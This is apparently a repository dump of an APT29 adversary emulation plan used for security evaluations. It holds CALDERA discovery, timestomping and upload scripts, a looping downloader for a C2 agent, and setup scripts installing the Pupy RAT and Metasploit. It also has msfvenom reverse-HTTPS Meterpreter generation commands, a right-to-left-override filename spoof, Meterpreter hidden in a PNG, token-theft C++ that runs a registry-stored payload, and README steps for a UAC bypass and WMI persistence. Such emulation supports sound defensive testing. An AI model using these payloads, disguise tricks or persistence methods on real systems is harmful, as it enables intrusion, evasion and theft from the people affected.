$Signature -Name GetCompNameEx -Namespace Kernel32 16 | $result = [Kernel32.GetCompNameEx]::GCN() 17 | return $result 18 | } 19 | function domain { 20 | $Signature=@" 21 | [DllImport("netapi32.dll", SetLastError=true)] 22 | public static extern int NetWkstaGetInfo(string servername, int level, out IntPtr bufptr); 23 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 24 | public struct WKSTA_INFO_100 { 25 | public int platform_id; 26 | public string computer_name; 27 | public string lan_group; 28 | public int ver_major; 29 | public int ver_minor; 30 | } 31 | public static string NWGI() 32 | { 33 | string host = null; 34 | IntPtr buffer; 35 | var ret = NetWkstaGetInfo(host, 100, out buffer); 36 | var strut_size = Marshal.SizeOf(typeof (WKSTA_INFO_100)); 37 | WKSTA_INFO_100 wksta_info; 38 | wksta_info = (WKSTA_INFO_100) Marshal.PtrToStructure(buffer, typeof (WKSTA_INFO_100)); 39 | string domainName = wksta_info.lan_group; 40 | return "DomainName:\t" + domainName.ToString(); 41 | } 42 | "@ 43 | Add-Type -MemberDefinition $Signature -Name NetWGetInfo -Namespace NetAPI32 44 | $result = [NetAPI32.NetWGetInfo]::NWGI() 45 | return $result 46 | } 47 | function user { 48 | $Signature=@" 49 | [DllImport("secur32.dll", CharSet=CharSet.Auto, SetLastError=true)] 50 | public static extern int GetUserNameEx (int nameFormat, string userName, ref int userNameSize); 51 | public static string GUN() { 52 | string uname = " "; 53 | int size = 40; 54 | int EXTENDED_NAME_FORMAT_NAME_DISPLAY = 2; 55 | string ret = ""; 56 | if(0 != GetUserNameEx(EXTENDED_NAME_FORMAT_NAME_DISPLAY, uname, ref size)) 57 | { 58 | ret += "UserName:\t" + uname.ToString(); 59 | } 60 | return ret; 61 | } 62 | "@ 63 | Add-Type -MemberDefinition $Signature -Name GetUNameEx -Namespace Secur32 64 | $result = [Secur32.GetUNameEx]::GUN() 65 | return $result 66 | } 67 | function pslist { 68 | $Signature=@" 69 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] 70 | private struct PROCESSENTRY32 71 | { 72 | const int MAX_PATH = 260; 73 | internal UInt32 dwSize; 74 | internal UInt32 cntUsage; 75 | internal UInt32 th32ProcessID; 76 | internal IntPtr th32DefaultHeapID; 77 | internal UInt32 th32ModuleID; 78 | internal UInt32 cntThreads; 79 | internal UInt32 th32ParentProcessID; 80 | internal Int32 pcPriClassBase; 81 | internal UInt32 dwFlags; 82 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = MAX_PATH)] 83 | internal string szExeFile; 84 | } 85 | [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] 86 | static extern IntPtr CreateToolhelp32Snapshot([In]UInt32 dwFlags, [In]UInt32 th32ProcessID); 87 | 88 | [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] 89 | static extern bool Process32First([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe); 90 | 91 | [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] 92 | static extern bool Process32Next([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe); 93 | 94 | [DllImport("kernel32", SetLastError = true)] 95 | [return: MarshalAs(UnmanagedType.Bool)] 96 | private static extern bool CloseHandle([In] IntPtr hObject); 97 | 98 | public static string CT32S() { 99 | IntPtr hProcessSnap = CreateToolhelp32Snapshot(0x00000002, 0); 100 | PROCESSENTRY32 procEntry = new PROCESSENTRY32(); 101 | procEntry.dwSize = (UInt32)Marshal.SizeOf(typeof(PROCESSENTRY32)); 102 | string ret = ""; 103 | if (Process32First(hProcessSnap, ref procEntry)) 104 | { 105 | do 106 | { 107 | ret += (procEntry.th32ProcessID).ToString() + "\t" + (procEntry.szExeFile).ToString() + "\n"; 108 | } while (Process32Next(hProcessSnap, ref procEntry)); 109 | } 110 | CloseHandle(hProcessSnap); 111 | return ret; 112 | } 113 | "@ 114 | Add-Type -MemberDefinition $Signature -Name CT32Snapshot -Namespace Kernel32 115 | $result = [Kernel32.CT32Snapshot]::CT32S() 116 | return $result 117 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepTwelve.ps1: -------------------------------------------------------------------------------- 1 | function detectav { 2 | $AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct 3 | 4 | $ret = @() 5 | foreach($AntiVirusProduct in $AntiVirusProducts){ 6 | 7 | #Create hash-table for each computer 8 | $ht = @{} 9 | $ht.Name = $AntiVirusProduct.displayName 10 | $ht.'Product GUID' = $AntiVirusProduct.instanceGuid 11 | $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe 12 | $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe 13 | $ht.'Timestamp' = $AntiVirusProduct.timestamp 14 | 15 | 16 | #Create a new object for each computer 17 | $ret += New-Object -TypeName PSObject -Property $ht 18 | } 19 | Return $ret 20 | } 21 | function software { 22 | $comp = $env:ComputerName 23 | $keys = "SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall", 24 | "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" 25 | $type = [Microsoft.Win32.RegistryHive]::LocalMachine 26 | $regKey = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey($type, $comp) 27 | $ret = "" 28 | foreach ($key in $keys) { 29 | $a = $regKey.OpenSubKey($key) 30 | $subkeyNames = $a.GetSubKeyNames() 31 | foreach($subkeyName in $subkeyNames) { 32 | $productKey = $a.OpenSubKey($subkeyName) 33 | $productName = $productKey.GetValue("DisplayName") 34 | $productVersion = $productKey.GetValue("DisplayVersion") 35 | $productComments = $productKey.GetValue("Comments") 36 | $out = $productName + " | " + $productVersion + " | " + $productComments + "`n" 37 | $ret += $out 38 | } 39 | } 40 | Return $ret 41 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1: -------------------------------------------------------------------------------- 1 | function timestomp { 2 | [CmdletBinding()] param ( 3 | [string] $dest 4 | ) 5 | $source = (gci ((gci env:windir).Value + '\system32') | ? { !$_.PSIsContainer } | Where-Object { $_.LastWriteTime -lt $(get-date -format "MM/dd/yyyy") } | Get-Random | %{ $_.FullName }) 6 | [IO.File]::SetCreationTime($dest, [IO.File]::GetCreationTime($source)) 7 | [IO.File]::SetLastAccessTime($dest, [IO.File]::GetLastAccessTime($source)) 8 | [IO.File]::SetLastWriteTime($dest, [IO.File]::GetLastWriteTime($source)) 9 | } 10 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/update.ps1: -------------------------------------------------------------------------------- 1 | function update 2 | { 3 | Param( 4 | [Parameter(Mandatory=$true)][String]$server 5 | ) 6 | $OldPids = Gwmi Win32_Process -Filter "Name='sandcat.exe'" | Select -Property ParentProcessId,ProcessId 7 | if ($OldPids) 8 | { 9 | echo "[*] sandcat.exe is running" 10 | ForEach-Object -InputObject $OldPids -Process { try { Stop-Process $_.ProcessId; Stop-Process $_.ParentProcessId } catch { "[!] could not kill sandcat.exe" }} 11 | } 12 | else 13 | { 14 | echo "[!] sandcat.exe is not running" 15 | } 16 | $SandcatPath = "C:\Users\Public\sandcat.exe" 17 | while($true) 18 | { 19 | if(!(Test-Path $SandcatPath)) 20 | { 21 | $url="$server/file/download" 22 | $wc=New-Object System.Net.WebClient 23 | $wc.Headers.add("file","sandcat.go") 24 | $wc.Headers.add("platform","windows") 25 | $output="C:\Users\Public\sandcat.exe" 26 | $wc.DownloadFile($url,$output) 27 | } 28 | C:\Users\Public\sandcat.exe -server $server -group diy_eval 29 | sleep -Seconds 60 30 | } 31 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/upload.ps1: -------------------------------------------------------------------------------- 1 | #<# 2 | # .SOURCE 3 | # https://github.com/PowerShell/PowerShell/issues/2112#issuecomment-325133097 4 | ##> 5 | function Invoke-MultipartFormDataUpload 6 | { 7 | [CmdletBinding()] 8 | PARAM 9 | ( 10 | [string][parameter(Mandatory = $true)][ValidateNotNullOrEmpty()]$InFile, 11 | [string]$ContentType, 12 | [Uri][parameter(Mandatory = $true)][ValidateNotNullOrEmpty()]$Uri, 13 | [System.Management.Automation.PSCredential]$Credential 14 | ) 15 | BEGIN 16 | { 17 | if (-not (Test-Path $InFile)) 18 | { 19 | $errorMessage = ("File {0} missing or unable to read." -f $InFile) 20 | $exception = New-Object System.Exception $errorMessage 21 | $errorRecord = New-Object System.Management.Automation.ErrorRecord $exception, 'MultipartFormDataUpload', ([System.Management.Automation.ErrorCategory]::InvalidArgument), $InFile 22 | $PSCmdlet.ThrowTerminatingError($errorRecord) 23 | } 24 | 25 | if (-not $ContentType) 26 | { 27 | Add-Type -AssemblyName System.Web 28 | 29 | $mimeType = [System.Web.MimeMapping]::GetMimeMapping($InFile) 30 | 31 | if ($mimeType) 32 | { 33 | $ContentType = $mimeType 34 | } 35 | else 36 | { 37 | $ContentType = "application/octet-stream" 38 | } 39 | } 40 | } 41 | PROCESS 42 | { 43 | Add-Type -AssemblyName System.Net.Http 44 | 45 | $httpClientHandler = New-Object System.Net.Http.HttpClientHandler 46 | 47 | if ($Credential) 48 | { 49 | $networkCredential = New-Object System.Net.NetworkCredential @($Credential.UserName, $Credential.Password) 50 | $httpClientHandler.Credentials = $networkCredential 51 | $httpClientHandler.PreAuthenticate = $true 52 | $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler 53 | #$password = Get-PlainText -SecureString $Credential.Password 54 | $Base64Auth = [System.Convert]::ToBase64String([System.Text.Encoding]::GetEncoding("iso-8859-1").GetBytes([String]::Format( "{0}:{1}", $Credential.UserName, $Credential.GetNetworkCredential().Password))) 55 | #$Base64Auth = [Convert]::ToBase64String([Text.Encoding]::GetEncoding("iso-8859-1").Getbytes("$($Credential.UserName):$($password)")) 56 | $httpClient.DefaultRequestHeaders.Add("Authorization", "Basic $Base64Auth") 57 | } 58 | else { 59 | $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler 60 | } 61 | 62 | $httpClient.Timeout = 18000000000 63 | #$httpClient.DefaultRequestHeaders.Add("AUTHORIZATION", "Basic YTph") 64 | 65 | $packageFileStream = New-Object System.IO.FileStream @($InFile, [System.IO.FileMode]::Open) 66 | 67 | $contentDispositionHeaderValue = New-Object System.Net.Http.Headers.ContentDispositionHeaderValue "form-data" 68 | $contentDispositionHeaderValue.Name = "package" 69 | $contentDispositionHeaderValue.FileName = (Split-Path $InFile -leaf) 70 | 71 | $streamContent = New-Object System.Net.Http.StreamContent $packageFileStream 72 | $streamContent.Headers.ContentDisposition = $contentDispositionHeaderValue 73 | $streamContent.Headers.ContentType = New-Object System.Net.Http.Headers.MediaTypeHeaderValue $ContentType 74 | 75 | $content = New-Object System.Net.Http.MultipartFormDataContent 76 | $content.Add($streamContent) 77 | 78 | try 79 | { 80 | $response = $httpClient.PostAsync($Uri, $content).Result 81 | 82 | if (!$response.IsSuccessStatusCode) 83 | { 84 | $responseBody = $response.Content.ReadAsStringAsync().Result 85 | $errorMessage = "Status code {0}. Reason {1}. Server reported the following message: {2}." -f $response.StatusCode, $response.ReasonPhrase, $responseBody 86 | 87 | throw [System.Net.Http.HttpRequestException] $errorMessage 88 | } 89 | 90 | #return $response.Content.ReadAsStringAsync().Result 91 | return $response 92 | 93 | } 94 | catch [Exception] 95 | { 96 | $PSCmdlet.ThrowTerminatingError($_) 97 | return $response 98 | } 99 | finally 100 | { 101 | if($null -ne $httpClient) 102 | { 103 | $httpClient.Dispose() 104 | } 105 | 106 | if($null -ne $response) 107 | { 108 | $response.Dispose() 109 | } 110 | } 111 | } 112 | END { } 113 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/‮cod.3aka.scr.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/‮cod.3aka.scr.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/templates/evals.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 |
5 |
6 |
7 |

ATT&CK | Evals - APT 29

8 |
9 |

About

10 |
11 | This CALDERA plugin is meant to emulate the techniques used by the MITRE ATT&CK team in ATT&CK evaluations.
12 | Multiple CALDERA adversary profiles have been developed for both APT3 and APT29.
13 | Consult the evals' plugin README.md for environment setup guidance. 14 | For general CALDERA questions, consult the CALDERA wiki . 15 |
16 |
17 | 18 | 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/APT29_EmuPlan.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/APT29_EmuPlan.pdf -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/APT29_Opflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/APT29_Opflow.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/install_day1_tools.sh: -------------------------------------------------------------------------------- 1 | # Install pre-reqs 2 | sudo apt update -y 3 | sudo apt install curl git -y 4 | 5 | # Install Pupy RAT 6 | git clone --recursive https://github.com/n1nj4sec/pupy.git 7 | cd pupy 8 | ./install.sh 9 | sed 's/9000:9000/1234:1234/g' pupy/conf/docker-compose.yml > /tmp/docker-compose.yml 10 | cp /tmp/docker-compose.yml pupy/conf/docker-compose.yml 11 | 12 | # Install Metasploit 13 | curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall 14 | chmod 755 msfinstall 15 | ./msfinstall -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payload_configs.md: -------------------------------------------------------------------------------- 1 | ### Create Day 1 Payloads 2 | 3 | 4 | #### 1. CosmicDuke Payload (cod.3aka3.scr) 5 | 6 | | Filename | Location | Description | 7 | | ------ | ------ | ------ | 8 | | cod.3aka3.scr | payloads/cod.3aka3.scr | Portable executable that uses right-to-left override character to disguise file extension | 9 | 10 | 11 | 1. Generate a Pupy-EC4 callback payload: 12 | 13 | ``` 14 | gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host :1234 15 | ``` 16 | 17 | 2. On Windows attack platform, rename cod.3aka3.scr with right-to-left override character (https://redcanary.com/blog/right-to-left-override/) 18 | 19 | 1. Windows key and type 'Character Map'; select open 20 | 2. Scroll to the RTLO character (U+202E) 21 | 3. Select the RTLO character, then click "select", then click "copy" 22 | 4. Right click `cod.3aka3.scr`, then click "Rename" 23 | 5. Move cursor to beginning of filename. Press "ctrl-v" to paste RTLO character, and hit "enter" to save the rename. 24 | 6. The file should now be named "rcs.3aka3.doc" 25 | 26 | ![alt text](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/041515_2317_SpoofUsingR1.png) 27 | 28 | Screenshot taken from: https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/ 29 | 30 | 31 | #### 2. Privilege Escalation Payload (monkey.png) 32 | 33 | | Filename | Location | Description | 34 | | ------ | ------ | ------ | 35 | | monkey.png | payloads/monkey.png | Well formed PNG with embedded PowerShell-Meterpreter callback | 36 | 37 | Steps to re-create: 38 | 1. Generate a PowerShell-formatted Meterpreter payload: 39 | 40 | ``` 41 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 --format psh -o meterpreter.ps1 42 | ``` 43 | 44 | 2. Transfer meterpreter.ps1 to Windows attack platform; embed meterpreter.ps1 into a PNG file using Invoke-PSImage (https://github.com/peewpw/Invoke-PSImage): 45 | 46 | ``` 47 | Import-Module .\Invoke-PSImage.ps1 48 | ``` 49 | 50 | ``` 51 | Invoke-PSImage -Script .\meterpreter.ps1 -Out .\monkey.png -Image .\monkey.jpg 52 | ``` 53 | 54 | #### 3. Startup Folder Payload (strings64/hostui.exe) 55 | 56 | | Filename | Location | Description | 57 | | ------ | ------ | ------ | 58 | | strings64.exe | payloads/SysinternalsSuite/strings64.exe | Launches Meterpreter using CreateProcessWithToken API call 59 | 1. Generate PowerShell-formatted Meterpreter: 60 | 61 | ``` 62 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 --format psh-cmd 63 | ``` 64 | 65 | 2. Copy the PowerShell 1-liner to clipboard. Your clipboard should look like: 66 | 67 | `powershell.exe -nop -w hidden -e aQBmAc...base64 string...KAOwa=` 68 | 69 | Do **not** copy the execution preamble (`%COMSPEC% /b /c start /b /min`) 70 | 71 | 3. Open `payloads/readme.txt`; paste the PowerShell-Meterpreter blog on line `816`. This line should look like: 72 | 73 | `$javasvc = "powershell.exe -nop -w hidden -e aQBmAc...base64 string...KAOwa="` 74 | 75 | #### 4. Persistent Service Payload (javamtsup.exe) 76 | 77 | | Filename | Location | Description | 78 | | ------ | ------ | ------ | 79 | | javamtsup.exe | payloads/SysinternalsSuite/javamtsup.exe | Reverse HTTPS Meterpreter service executable | 80 | 81 | 1. Generate a Meterpreter service-binary: 82 | 83 | ``` 84 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 -f exe-service -o javamtsup.exe 85 | ``` 86 | 87 | #### 5. SeaDuke Payload (python.exe) 88 | 89 | | Filename | Location | Description | 90 | | ------ | ------ | ------ | 91 | | python.exe | payloads/Seaduke/python.exe | Python Meterpreter compiled to EXE with PyInstaller | 92 | 93 | 1. Generate python-formatted Meterpreter: 94 | 95 | ``` 96 | msfvenom -p python/meterpreter/reverse_https LHOST= LPORT=8443 -o python.py 97 | ``` 98 | 99 | 2. Transfer python.py to Windows attack platform 100 | 101 | 3. Compile python.py into a portable executable using PyInstaller (https://pypi.org/project/PyInstaller/) 102 | 103 | ``` 104 | pyinstaller -F python.py 105 | ``` 106 | 107 | 4. Pack the python.exe payload using UPX (https://github.com/upx/upx) 108 | 109 | ``` 110 | upx --brute python.exe 111 | ``` 112 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/Seaduke/python.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/Seaduke/python.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/Seaduke/rar.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/Seaduke/rar.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/Seaduke/sdelete64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/Seaduke/sdelete64.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/SysinternalsSuite/hostui.txt: -------------------------------------------------------------------------------- 1 | powershell.exe -c "Start-Process C:\Windows\System32\hostui.exe -verb runas" -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/SysinternalsSuite/javamtsup.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/SysinternalsSuite/javamtsup.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/SysinternalsSuite/strings64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/SysinternalsSuite/strings64.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/cod.3aka3.scr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/cod.3aka3.scr -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/hostui.cpp: -------------------------------------------------------------------------------- 1 | // hostui.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | DWORD FindProcessId(const std::wstring& processName); 12 | BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege); 13 | 14 | int main() 15 | { 16 | 17 | BOOL result; 18 | 19 | PROCESS_INFORMATION processInfo; 20 | STARTUPINFO StartupInfo; 21 | 22 | ZeroMemory(&StartupInfo, sizeof(STARTUPINFO)); 23 | ZeroMemory(&processInfo, sizeof(PROCESS_INFORMATION)); 24 | memset(&processInfo, 0x00, sizeof(PROCESS_INFORMATION)); 25 | StartupInfo.cb = sizeof(STARTUPINFO); 26 | 27 | std::string explorer_str("explorer.exe"); 28 | std::wstring explorer_wstr(explorer_str.begin(), explorer_str.end()); 29 | 30 | DWORD explorerProcessId = FindProcessId(explorer_wstr); // Find the ProcessId of EXPLORER.EXE 31 | //printf("Explorer PID: %u\n", dwProcessId); 32 | 33 | HANDLE hExplorerProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, explorerProcessId); // get a handle to EXPLORER.EXE's process 34 | if (hExplorerProcess) 35 | { 36 | HANDLE hExplorerToken; 37 | result = OpenProcessToken(hExplorerProcess, TOKEN_DUPLICATE, &hExplorerToken); // get a handle to EXPLORER.EXE's token 38 | 39 | if (result) 40 | { 41 | HANDLE duplicatedExplorerToken; 42 | result = DuplicateTokenEx( // duplicate EXPLORER.EXE's token 43 | hExplorerToken, 44 | TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID, 45 | NULL, 46 | SecurityImpersonation, 47 | TokenPrimary, 48 | &duplicatedExplorerToken); 49 | 50 | if (result) 51 | { 52 | TCHAR szCommandLine[MAX_PATH]; 53 | _tcscpy_s(szCommandLine, MAX_PATH, _T("powershell.exe -c \"Get-ItemPropertyValue 'HKLM:\\\\SOFTWARE\\Javasoft' 'value Supplement' | Invoke-Expression\"")); // read payload path from registry, pipe to IEX 54 | void* lpEnvironment = NULL; 55 | 56 | result = CreateProcessWithTokenW( // start the payload using the duplicated process token 57 | duplicatedExplorerToken, 58 | LOGON_WITH_PROFILE, 59 | NULL, 60 | szCommandLine, 61 | CREATE_NO_WINDOW | NORMAL_PRIORITY_CLASS, 62 | NULL, 63 | NULL, 64 | &StartupInfo, 65 | &processInfo); 66 | CloseHandle(duplicatedExplorerToken); 67 | } 68 | else 69 | { 70 | printf("[-] Failed to duplicate EXPLORER.EXE's token: %d\n", GetLastError()); 71 | return 1; 72 | } 73 | CloseHandle(hExplorerToken); 74 | } 75 | else 76 | { 77 | printf("[-] Failed to get a handle to EXPLORER.EXE's token: %d\n", GetLastError()); 78 | return 1; 79 | } 80 | CloseHandle(hExplorerProcess); 81 | } 82 | else 83 | { 84 | printf("[-] Failed to get a handle to EXPLORER.EXE's process: %d\n", GetLastError()); 85 | return 1; 86 | } 87 | return 0; 88 | } 89 | 90 | DWORD FindProcessId(const std::wstring& processName) 91 | { 92 | PROCESSENTRY32 processInfo; 93 | processInfo.dwSize = sizeof(processInfo); 94 | 95 | HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); 96 | if (processesSnapshot == INVALID_HANDLE_VALUE) 97 | return 0; 98 | 99 | Process32First(processesSnapshot, &processInfo); 100 | if (!processName.compare(processInfo.szExeFile)) 101 | { 102 | CloseHandle(processesSnapshot); 103 | return processInfo.th32ProcessID; 104 | } 105 | 106 | while (Process32Next(processesSnapshot, &processInfo)) 107 | { 108 | if (!processName.compare(processInfo.szExeFile)) 109 | { 110 | CloseHandle(processesSnapshot); 111 | return processInfo.th32ProcessID; 112 | } 113 | } 114 | 115 | CloseHandle(processesSnapshot); 116 | return 0; 117 | } 118 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/monkey.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/monkey.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/shockwave.local.pfx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/shockwave.local.pfx -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/rtlo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/rtlo.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/README.md: -------------------------------------------------------------------------------- 1 | # APT29 Day 2 (Steps 11 through 20) 2 | 3 | ## Acknowledgements 4 | 5 | ### Special thanks to the following public resources: 6 | * Atomic Red Team (https://github.com/redcanaryco/atomic-red-team) 7 | * Mimikatz (https://github.com/gentilkiwi/mimikatz) 8 | * Pinvoke (http://www.pinvoke.net) 9 | * PoshC2 (https://github.com/nettitude/PoshC2) 10 | * POSHSPY (https://github.com/matthewdunwoody/POSHSPY) 11 | * PowerSploit (https://github.com/PowerShellMafia/PowerSploit) 12 | * PSReflect-Functions (https://github.com/jaredcatkinson/PSReflect-Functions) 13 | * State of the Hack S2E01: #NoEasyBreach REVISITED (https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html) 14 | * Use PowerShell to Interact with the Windows API (https://devblogs.microsoft.com/scripting/use-powershell-to-interact-with-the-windows-api-part-1) 15 | * Yet another sdclt UAC bypass (http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) 16 | 17 | ## Overview 18 | 19 | * Emulation of APT29 usage of tools such as PowerDuke, POSHSPY, CloudDuke, as well as more recent (2016+) TTPs 20 | * Scenario begins with a target spearphishing leading into a low and slow, methodical approach to owning the initial target and eventually the entire domain 21 | * Includes establishing persistence, credential gathering, local and remote enumeration, and data exfil 22 | * Modular components (ex: PowerShell scripts) may be executed atomically 23 | 24 | ## Requirements 25 | 26 | ### Victim Systems: 27 | 1. 3 targets 28 | * [ ] 1 domain controller and 2 workstations 29 | * [ ] All Windows OS (tested and executed against Win10 1903) 30 | * [ ] Domain joined with at least 2 accounts (domain admin and another user) 31 | 2. Microsoft Outlook must be available locally on one of the victim workstations 32 | 33 | ### Red Team Systems: 34 | 1. Server running an offensive framework (we tested and executed using PoshC2 -- https://github.com/nettitude/PoshC2) capable of: 35 | * [ ] Executing native PowerShell commands 36 | * [ ] Loading and executing PowerShell scripts (.ps1) 37 | * [ ] Generating a DLL payload and an encoded PowerShell oneliner 38 | * [ ] Receiving and maintaining multiple callbacks at once 39 | 2. Online OneDrive Account (https://onedrive.live.com/) 40 | 41 | ## Red Team Setup 42 | 43 | ### Generate an encoded PowerShell oneliner payload, then copy: 44 | 1. Just the encoded portion (ex: `WwBTAH...=`) into `$enc_ps variable` (4th line from bottom) in `schemas.ps1` 45 | * ex: `$enc_ps = "WwBTAH...=="` 46 | 2. The entire value (ex: `powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAH...=`) into `CommandLineTemplate` variable (under `$ConsumerArgs` in 2nd paragraph) in `stepFifteen_wmi.ps1` 47 | * ex: `CommandLineTemplate="powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAH...="` 48 | 3. The entire value (ex: `powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAH...=`) into `-Value` variable (2nd line) in `stepFourteen_bypassUAC.ps1` 49 | * ex: `New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value "powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAH...="` 50 | 51 | ### Generate DLL payload, then on a separate Windows host: 52 | 1. [CMD] > `certutil -encode [file].dll blob` 53 | 2. [CMD] > `powershell` 54 | 3. [PS] > `$blob = (Get-Content .\blob) -join ""; $blob > .\blob` 55 | 4. Open `blob` file in text editor 56 | 5. Delete new line at end of file and copy all (CTRL-A, CTRL-C) 57 | 6. Paste value (ex: `-----BEGIN CERTIFICATE-----...-----END CERTIFICATE-----`) into `$bin` variable (6th line) in `schemas.ps1` 58 | 59 | ### Copy payloads to C2 server (wherever is appropriate for your C2 framework to have access to these files) 60 | 61 | ### Update `stepFourteen_credDump.ps1` -- directions are in file 62 | 63 | ### Prepare initial access payloads: 64 | 1. Login as non-domain admin user 65 | 2. Copy over the following files onto the Desktop of the initial victim: 66 | 1. `2016_United_States_presidential_election_-_Wikipedia.html` 67 | 2. `make_lnk.ps1` 68 | 3. `schemas.ps1` 69 | 2. Copy over `MITRE-ATTACK-EVALS.HTML` into the Documents folder of the initial victim 70 | 3. Execute `make_lnk.ps1` (Right click > Run with PowerShell), this will generate 